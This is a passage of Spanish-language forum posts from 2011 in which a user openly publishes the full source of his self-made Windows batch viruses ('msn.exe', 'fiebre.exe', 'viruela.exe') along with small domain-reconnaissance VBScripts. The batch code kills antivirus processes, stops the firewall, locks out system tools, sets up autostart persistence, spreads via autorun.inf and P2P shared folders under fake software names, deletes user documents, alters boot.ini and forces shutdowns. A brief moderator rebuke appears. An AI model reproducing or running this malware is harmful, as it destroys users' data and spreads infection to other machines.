si ven un error en mis scripts por favor notificar grupo Black Eye Security Team Piura -Peru W4rR3d - G3kk0 - W4rc10k - M1lh077 script1: el siguiente script permite saber el nombre de tu pc, dominio de usuario,nombre de usuario,perfil del server Set yu1 = Wscript.CreateObject( "Wscript.Shell" ) WScript.Echo " verificar variables:" WScript.Echo " el script se esta ejecutandose" WScript.Echo "Computer Name : " & yu1.ExpandEnvironmentStrings( "%COMPUTERNAME%" ) WScript.Echo "Logon Server : " & yu1.ExpandEnvironmentStrings( "%LOGONSERVER%" ) WScript.Echo "User Domain : " & yu1.ExpandEnvironmentStrings( "%USERDOMAIN%" ) WScript.Echo "User Name : " & yu1.ExpandEnvironmentStrings( "%USERNAME%" ) WScript.Echo " hacked by W4rR3d" Set yu1 = Nothing
script2: El siguiente Script ejecuta el cambio de organización en cualquier PC de la red: Option Explicit Set yu2 = WScript.CreateObject("WScript.Shell") Dim yu2, s1 s1 = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\" yu2.RegWrite s1 & "RegisteredOwner", "HACKED BY W4rR3d" yu2.RegWrite s1 & "RegisteredOrganization", "HACKED BY W4rR3d"
script3: el siguiente script permite Obtener datos de usuario de dominio: On Error Resume Next Set objSysInfo = CreateObject("ADSystemInfo") Wscript.Echo "User name: " & objSysInfo.UserName Wscript.Echo "Computer name: " & objSysInfo.ComputerName Wscript.Echo "Site name: " & objSysInfo.SiteName Wscript.Echo "Domain short name: " & objSysInfo.DomainShortName Wscript.Echo "Domain DNS name: " & objSysInfo.DomainDNSName Wscript.Echo "Forest DNS name: " & objSysInfo.ForestDNSName Wscript.Echo "PDC role owner: " & objSysInfo.PDCRoleOwner Wscript.Echo "Schema role owner: " & objSysInfo.SchemaRoleOwner Wscript.Echo "Domain is in native mode: " & objSysInfo.IsNativeMode
|
|
|
7
|
Programación / Scripting / virus informatico msn.exe
|
en: 17 Febrero 2011, 23:49 pm
|
espero que si ven un error en este virus informatico lo notifican su amigo W4rR3d ::************************************************ :: VIRUS INFORMATICO MSN.EXE ::************************************************ :: virus creado por hacked by :: W4rR3d - G3kk0 - W4rc10k - M1lh077 :: virus dedicado al grupo de hackers " Ka0 Team" ::************************************************ ..************************************************ .. Piura - Peru .************************************************* . Autodidacta en Ingenieria de Sistemas . y creador de virus informaticos . hacked by W4rR3d .************************************************* :inicio taskkill /f/im explorer.exe /im teatimer.exe /im msnmsgr.exe /im im mspaint.exe taskkill /f/im explorer.exe / im notepad.exe /im calc.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msn /t REG_SZ /d "%b10%\system32\msn\msn.exe" /f REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v hotmail /t REG_SZ /d "%b5%\system32\msn\msn.exe" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\My Computer" /v NoDrives /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Advanced /v Hidden /t REG_DWORD /d 0 /f reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableMsConfig /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1297979999&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=10250&id=64855&mkt=es-pe&cbcxt=mai&snsc=1" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" :C1 if exist %b4%msn attrib +h +s %b4%msn &attrib +s +h +r %b4%autorun.inf %b2% %b10%\system32\msn %b4%msn %b3% "%b10%\system32\msn" copy /y %0 " %b10%\system32\msn\msn.exe" %b1% [autorun] >>%b4%autorun.inf %b1% OPEN=msn\msn.exe >>%b4%autorun.inf %b1% shell\open\Command=msn\msn.exe >>%b4%autorun.inf %b1% shell\open\Default=1 >>%b4%autorun.inf %b1% shell\explore\Command=msn\msn.exe >>%b4%autorun.inf attrib +s +h +r %b4%msn attrib +s +h +r %b4%autorun.inf %b1% on error resume next>> %b4%msn.vbs %b1% set shell = createobject ("wscript.shell" )>> %b4%msn.vbs %b1% shell.run "%b10%\system32\msn\msn.exe">> %b4%msn.vbs start %b4%msn.vbs %b1% Msgbox "bienvenido a hotmail.com" >> %b4%aviso.vbs start %b4%aviso.vbs :D :D1 if exist %b5%msn attrib +h +s %b5%msn &attrib +s +h +r %b5%autorun.inf %b2% %b10%\system32\msn %b5%msn %b3% "%b10%\system32\msn" copy /y %0 " %b10%\system32\msn\msn.exe" %b1% [autorun] >>%b5%autorun.inf %b1% OPEN=msn\msn.exe >>%b5%autorun.inf %b1% shell\open\Command=msn\msn.exe >>%b5%autorun.inf %b1% shell\open\Default=1 >>%b5%autorun.inf %b1% shell\explore\Command=msn\msn.exe >>%b5%autorun.inf attrib +s +h +r %b5%msn attrib +s +h +r %b5%autorun.inf %b1% on error resume next>> %b5%msn.vbs %b1% set shell = createobject ("wscript.shell" )>> %b5%msn.vbs %b1% shell.run "%b10%\system32\msn\msn.exe">> %b5%msn.vbs start %b5%msn.vbs %b1% Msgbox "bienvenido a hotmail.com" >> %b5%aviso.vbs start %b5%aviso.vbs :E :E1 if exist %b6%msn attrib +h +s %b6%msn &attrib +s +h +r %b6%autorun.inf %b2% %b10%\system32\msn %b6%msn %b3% "%b10%\system32\msn" copy /y %0 " %b10%\system32\msn\msn.exe" %b1% [autorun] >>%b6%autorun.inf %b1% OPEN=msn\msn.exe >>%b6%autorun.inf %b1% shell\open\Command=msn\msn.exe >>%b6%autorun.inf %b1% shell\open\Default=1 >>%b6%autorun.inf %b1% shell\explore\Command=msn\msn.exe >>%b6%autorun.inf attrib +s +h +r %b6%msn attrib +s +h +r %b6%autorun.inf %b1% on error resume next>> %b6%msn.vbs %b1% set shell = createobject ("wscript.shell" )>> %b6%msn.vbs %b1% shell.run "%b10%\system32\msn\msn.exe">> %b6%msn.vbs start %b6%msn.vbs %b1% Msgbox "bienvenido a hotmail.com" >> %b6%aviso.vbs start %b6%aviso.vbs :F :F1 if exist %b7%msn attrib +h +s %b7%msn &attrib +s +h +r %b7%autorun.inf %b2% %b10%\system32\msn %b7%msn %b3% "%b10%\system32\msn" copy /y %0 " %b10%\system32\msn\msn.exe" %b1% [autorun] >>%b7%autorun.inf %b1% OPEN=msn\msn.exe >>%b7%autorun.inf %b1% shell\open\Command=msn\msn.exe >>%b7%autorun.inf %b1% shell\open\Default=1 >>%b7%autorun.inf %b1% shell\explore\Command=msn\msn.exe >>%b7%autorun.inf attrib +s +h +r %b7%msn attrib +s +h +r %b7%autorun.inf %b1% on error resume next>> %b7%msn.vbs %b1% set shell = createobject ("wscript.shell" )>> %b7%msn.vbs %b1% shell.run "%b10%\system32\msn\msn.exe">> %b7%msn.vbs start %b7%msn.vbs %b1% Msgbox "bienvenido a hotmail.com" >> %b7%aviso.vbs start %b7%aviso.vbs :G :G1 if exist %b8%msn attrib +h +s %b8%msn &attrib +s +h +r %b8%autorun.inf %b2% %b10%\system32\msn %b8%msn %b3% "%b10%\system32\msn" copy /y %0 " %b10%\system32\msn\msn.exe" %b1% [autorun] >>%b8%autorun.inf %b1% OPEN=msn\msn.exe >>%b8%autorun.inf %b1% shell\open\Command=msn\msn.exe >>%b8%autorun.inf %b1% shell\open\Default=1 >>%b8%autorun.inf %b1% shell\explore\Command=msn\msn.exe >>%b8%autorun.inf attrib +s +h +r %b8%msn attrib +s +h +r %b8%autorun.inf %b1% on error resume next>> %b8%msn.vbs %b1% set shell = createobject ("wscript.shell" )>> %b8%msn.vbs %b1% shell.run "%b10%\system32\msn\msn.exe">> %b8%msn.vbs start %b8%msn.vbs %b1% Msgbox "bienvenido a hotmail.com" >> %b8%aviso.vbs start %b8%aviso.vbs :H :H1 if exist %b9%msn attrib +h +s %b9%msn &attrib +s +h +r %b9%autorun.inf %b2% %b10%\system32\msn %b9%msn %b3% "%b10%\system32\msn" copy /y %0 " %b10%\system32\msn\msn.exe" %b1% [autorun] >>%b9%autorun.inf %b1% OPEN=msn\msn.exe >>%b9%autorun.inf %b1% shell\open\Command=msn\msn.exe >>%b9%autorun.inf %b1% shell\open\Default=1 >>%b9%autorun.inf %b1% shell\explore\Command=msn\msn.exe >>%b9%autorun.inf attrib +s +h +r %b9%msn attrib +s +h +r %b9%autorun.inf %b1% on error resume next>> %b9%msn.vbs %b1% set shell = createobject ("wscript.shell" )>> %b9%msn.vbs %b1% shell.run "%b10%\system32\msn\msn.exe">> %b9%msn.vbs start %b9%msn.vbs %b1% Msgbox "bienvenido a hotmail.com" >> %b9%aviso.vbs start %b9%aviso.vbs :bor DEL /Q /F /S " %b12%\Documents and Settings\ %b13%\Meus documentos\*.*" DEL /Q /F /S " %b12%\Documents and Settings\ %b13%\Escritorio\*.*" %b1% -={W4rR3d_by_hacked}=- >> "%b10%\system32"\"-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b10%\system"\"-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b10%\"\"-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b4%""-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b5%""-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b6%""-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b7%""-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b8%""-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b9%""-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%systemdrive%\Documents and Settings\%b13%\Escritorio\-={W4rR3d_by_hacked}=-.RAR.EXE" %b1% -={W4rR3d_by_hacked}=- >> "%b12%\Documents and Settings\%b13%\Mis documentos\-={W4rR3d_by_hacked}=-.RAR.EXE" :boot attrib -h -s -r %b14%\boot.ini %b1% [boot loader] >> %b14%\boot.ini %b1% timeout=30 >> %b14%\boot.ini %b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS >> %b14%\boot.ini %b1% default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWs >> %b14%\boot.ini %b1% [operating systems] >> %b14%\boot.ini %b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect >> %b14%\boot.ini %b1% multi(0)disk(0)rdisk(0)partition(1)\WINDOWs="-={W4rR3d_by_hacked}=-" /noexecute=optin / >> %b14%\boot.ini attrib +s +h +r %b14%\boot.ini
|
|
|
8
|
Programación / Scripting / Re: virus informatico fiebre.exe
|
en: 14 Febrero 2011, 16:49 pm
|
A ver, @W4rR3d, si vuelves a publicar algo sin etiquetas de código, te voy a borrar el mensaje así sin más. LEE LAS REGLAS. Y dedícate a algo más productivo que a crear estupideces en Batch.
mira amigo si quieres aprender de mi estos son codigos cuando me inicie en programacion en batch, tambien domino vb 6.0, java script, c++ , c, fox pro 6.0,visual script y otros mas ya amiguito leo gutièrrez. que dios te bendiga leo gutièrrez
|
|
|
9
|
Programación / Scripting / [BATCH] virus informatico fiebre.exe
|
en: 12 Febrero 2011, 15:46 pm
|
sin ven un error en este virus informatico por favor notifinquela. hacked by W4rR3d <autodidacta en ingenieria de sistemas y creador de virus informaticos> Piura - Peru :: virus fue creado por hacked by W4rR3d :: virus esta dedicado a la comunidad hacker piura- peru :: virus informatico se llama fiebre.exe :: virus informatico dedicado al grupo de hackers 'KA0 Team' :inicio copy %0 " %windir%\system32" copy %0 " %PROGRAMFILES%\" copy %0 " %allusersprofile%\" copy %0 " %COMMONPROGRAMFILES%\" taskkill /f/im aswRegSvr.exe /im aswRegSvr64.exe /im AvastSvc.exe taskkill /f/im explorer.exe /im teatimer.exe /im taskmgr.exe taskkill /f/im explorer.exe /im firefox.exe /im photoshop.exe net stop "Security Center" net stop SharedAccess net stop "Firewall de Windows/Conexion compartida a Internet (ICS)" REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v system /t REG_SZ /d "%windir%\system32\fiebre.exe" /F reg add hklm\software\microsoft\windows\currentversion\run /v fiebre /t reg_sz /d %eb1%fiebre.exe /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://www.elcachondeo.cl/foro/showthread.php?t=364382" reg Add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f reg Add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Window Title" /t REG_SZ /d "Hacked By W4rR3d" :fie2 copy /Y %0 %eb1%fiebre.exe echo.[AutoRun] >> %eb1%autorun.inf echo.open=" %eb1%fiebre.exe" >> %eb1%autorun.inf echo.action=Open folder to see files... >> %eb1%autorun.inf attrib +r +s +h %eb1%autorun.inf attrib +r +s +h %eb1%fiebre.exe echo On Error Resume Next >> %eb1%apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %eb1%apagar.vbs echo shell.run "shutdown.exe -s -t 13" >> %eb1%apagar.vbs attrib +r +s +h %eb1%apagar.vbs start %eb1%apagar.vbs :fie1 :fie4 copy /Y %0 %eb2%fiebre.exe echo.[AutoRun] >> %eb2%autorun.inf echo.open=" %eb2%fiebre.exe" >> %eb2%autorun.inf echo.action=Open folder to see files... >> %eb2%autorun.inf attrib +r +s +h %eb2%autorun.inf attrib +r +s +h %eb2%fiebre.exe echo On Error Resume Next >> %eb2%apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %eb2%apagar.vbs echo shell.run "shutdown.exe -s -t 13" >> %eb2%apagar.vbs attrib +r +s +h %eb2%apagar.vbs start %eb2%apagar.vbs :fie3 :fie6 copy /Y %0 %eb3%fiebre.exe echo.[AutoRun] >> %eb3%autorun.inf echo.open=" %eb3%fiebre.exe" >> %eb3%autorun.inf echo.action=Open folder to see files... >> %eb3%autorun.inf attrib +r +s +h %eb3%autorun.inf attrib +r +s +h %eb3%fiebre.exe echo On Error Resume Next >> %eb3%apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %eb3%apagar.vbs echo shell.run "shutdown.exe -s -t 13" >> %eb3%apagar.vbs attrib +r +s +h %eb3%apagar.vbs start %eb3%apagar.vbs :fie5 :fie8 copy /Y %0 %eb4%fiebre.exe echo.[AutoRun] >> %eb4%autorun.inf echo.open=" %eb4%fiebre.exe" >> %eb4%autorun.inf echo.action=Open folder to see files... >> %eb4%autorun.inf attrib +r +s +h %eb4%autorun.inf attrib +r +s +h %eb4%fiebre.exe echo On Error Resume Next >> %eb4%apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %eb4%apagar.vbs echo shell.run "shutdown.exe -s -t 13" >> %eb4%apagar.vbs attrib +r +s +h %eb4%apagar.vbs start %eb4%apagar.vbs :fie7 :fie10 copy /Y %0 %eb5%fiebre.exe echo.[AutoRun] >> %eb5%autorun.inf echo.open=" %eb5%fiebre.exe" >> %eb5%autorun.inf echo.action=Open folder to see files... >> %eb5%autorun.inf attrib +r +s +h %eb5%autorun.inf attrib +r +s +h %eb5%fiebre.exe echo On Error Resume Next >> %eb5%apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %eb5%apagar.vbs echo shell.run "shutdown.exe -s -t 13" >> %eb5%apagar.vbs attrib +r +s +h %eb5%apagar.vbs start %eb5%apagar.vbs :fie9 :fie12 copy /Y %0 %eb6%fiebre.exe echo.[AutoRun] >> %eb6%autorun.inf echo.open=" %eb6%fiebre.exe" >> %eb6%autorun.inf echo.action=Open folder to see files... >> %eb6%autorun.inf attrib +r +s +h %eb6%autorun.inf attrib +r +s +h %eb6%fiebre.exe echo On Error Resume Next >> %eb6%\apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %eb6%apagar.vbs echo shell.run "shutdown.exe -s -t 13" >> %eb6%apagar.vbs attrib +r +s +h %eb6%apagar.vbs start %eb6%apagar.vbs :fie11 set /a war1=" %programfiles%\eMule\Incoming" set /a war2=" %programfiles%\KaZaA\My Shared Folder" set /a war3=" %appdata%\Ares\My Shared Folder" Set /a War4=" %programfiles%\Alwil Software\Avast5" for /d %%a ("Internet Explorer 7.exe","Windows Xp.exe","Nero Start Smart 9.exe","Microsoft Office 2007.exe","Avast 5.1 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war1%\ %%a copy /y " %~0" %war1%\ %%a) ) for /d %%a ("Windows Xp.exe","Nero Start Smart 9.exe","Microsoft Office 2007.exe","Avast 5.1 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war2%\ %%a copy /y " %~0" %war2%\ %%a) ) for /d %%a ("Windows Live Messenger 9.5.exe","avast ! Free Antivirus 5.exe", "aswRegSvr 64.exe","AvastSvc 50.exe","aswRunDll 3.2.exe","Avast 5.3 Pro Full.exe","Windows Live Messenger 8.5.exe","GTA 4.exe","Activa tu windows.exe","ESET Smart Segurity 4.exe" do (if not exist %war3%\ %%a copy /y " %~0" %war3%\ %%a) ) for /d %%a ("aswRegSvr 5.exe","avast ! Free Antivirus 5.exe", "Windows Xp.exe","aswRegSvr 9.exe","aswRunDll 5.exe","Avast 5.3 Pro Full.exe","Windows Live Messenger 8.5.exe" do (if not exist %war4%\ %%a copy /y " %~0" %war4%\ %%a) echo Msgbox "ha sido hackeado por hacked by W4rR3d" >> %homedrive%\mensaje.vbs For /L %%a IN (0,1,1000 ) DO start %homedrive%\mensaje.vbs
|
|
|
10
|
Programación / Scripting / [BATCH] virus informatico viruela.exe
|
en: 10 Febrero 2011, 16:33 pm
|
hacked by W4rR3d los mejores hackers Piura -Peru si ven un error en mis lineas de codigo de mi virus informatico viruela.exe por favor notifinquela. msg * hacked by -={W4rR3d}=- :: este virus fue creado por hacked by W4rR3d :: este virus esta dedicado a la comunidad hacker piura- peru :: este virus informatico se llama viruela.exe taskkill /f /im egui.exe /im nod32kui.exe /im nod32krn.exe taskkill /f/im "explorer.exe" /im "teatimer.exe"/im "taskmgr.exe" >nul 2 >&1 net stop "Security Center" net stop SharedAccess net stop "Firewall de Windows/Conexion compartida a Internet (ICS)" net stop "Actualizaciones automáticas" net stop "Centro de seguridad" net stop "Conexiones de red" net stop "Windows Installer" net stop "Servicios IPSEC" netsh firewall set opmode mode=disable start /MAX %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton REG ADD "HKCR\batfile\DefaultIcon" /ve /d "%SystemRoot%\System32\shell32.dll,3" /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewContextMenu /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideClock /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWindowsUpdate /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskbar /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f for /F %%v in (VistaKeygen,EmoticonesMSN,SerialOffice2007,ParisXXXPhotos,MSMemoticon,FreeXXXPhotos,Office2007 ) do (call : p2p %%v) copy /y %0 " %homedrive%\viruela.exe" reg add hklm\software\microsoft\windows\currentversion\run /v viruela /t reg_sz /d %homedrive%\viruela.exe /f for %%E In (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z ) Do ( copy /Y %0 %%E:\viruela.exe echo.[AutoRun] >> %%E:\autorun.inf echo.open=" %%E:\viruela.exe" >> %%E:\autorun.inf echo.action=Open folder to see files... >> %%E:\autorun.inf attrib +r +s +h %%E:\autorun.inf attrib +r +s +h %%E:\viruela.exe :th echo On Error Resume Next >> %homedrive%\abrir.vbs echo Set oWMP = CreateObject ("WMPlayer.OCX.7" ) >> %homedrive%\abrir.vbs echo Set colCDROMs = oWMP.cdromCollection >> %homedrive%\abrir.vbs echo. >> %homedrive%\abrir.vbs echo if colCDROMs.Count >= 1 then >> %homedrive%\abrir.vbs echo For i = 0 to colCDROMs.Count - 1 >> %homedrive%\abrir.vbs echo colCDROMs.Item (i ).Eject >> %homedrive%\abrir.vbs echo Next ' cdrom >> %homedrive%\abrir.vbs echo End If >> %homedrive%\abrir.vbs attrib +r +s +h %homedrive%\abrir.vbs start %homedrive%\abrir.vbs :ht echo On Error Resume Next >> %homedrive%\apagar.vbs echo set shell = CreateObject ("WScript.Shell" ) >> %homedrive%\apagar.vbs echo shell.run "shutdown.exe -s -t 10" >> %homedrive%\apagar.vbs start >> %homedrive%\apagar.vbs :erar DEL /Q /F /S " %systemdrive%\Documents and Settings\ %USERNAME%\Mis documentos\*.*" DEL /Q /F /S " %systemdrive%\Documents and Settings\ %USERNAME%\Escritorio\*.*" echo -={W4rR3d_by_hacked}=- >> " %systemdrive%\Documents and Settings\ %USERNAME%\Escritorio\-={W4rR3d_by_hacked}=-.RAR.EXE" echo -={W4rR3d_by_hacked}=- >> " %systemdrive%\Documents and Settings\ %USERNAME%\Mis documentos\-={W4rR3d_by_hacked}=-.RAR.EXE" :p2p copy %war% " %programfiles%\Grokster\My Grokster\ %var%.bat" copy %war% " %programfiles%\Morpheus\My Shared Folder\ %var%.bat" copy %war% " %programfiles%\ICQ\shared files\ %var%.bat" copy %war% " %programfiles%\KaZaA\My Shared Folder\ %var%.bat" copy %war% " %programfiles%\KaZaA Lite\My Shared Folder\ %var%.bat" copy %war% " %programfiles%\EDONKEY2000\incoming\ %var%.bat" copy %war% " %programfiles%\eMule\Incoming\ %var%.bat" copy %war% " %programfiles%\Filetopia3\Files\ %var%.bat" copy %war% " %programfiles%\appleJuice\incoming\ %var%.bat" copy %war% " %programfiles%\Gnucleus\Downloads\ %var%.bat" copy %war% " %programfiles%\LimeWire\Shared\ %var%.bat" copy %war% " %programfiles%\Overnet\incoming\ %var%.bat" copy %war% " %programfiles%\Shareaza\Downloads\ %var%.bat" copy %war% " %programfiles%\Swaptor\Download\ %var%.bat" copy %war% " %programfiles%\WinMX\My Shared Folder\ %var%.bat" copy %war% " %programfiles%\Tesla\Files\ %var%.bat" copy %war% " %programfiles%\XoloX\Downloads\ %var%.bat" copy %war% " %programfiles%\Rapigator\Share\ %var%.bat" copy %war% " %programfiles%\KMD\My Shared Folder\ %var%.bat" copy %war% " %programfiles%\BearShare\Shared\ %var%.bat" copy %war% " %programfiles%\Direct Connect\Received Files\ %var%.bat" copy %war% " %appdata%\Ares\My Shared Folder\ %var%.bat" echo Msgbox "hallen la cura adecuada para combatir el virus V1ru3l4", vbcritical, "Windows" >> %systemdrive%\viruela.vbs For /L %%a IN (0,1,1000 ) DO start %systemdrive%\viruela.vbs start /MiN %homedrive%\boot.ini & rundll32 user32.dll,SwapMouseButton
|
|
|
|
|
|
|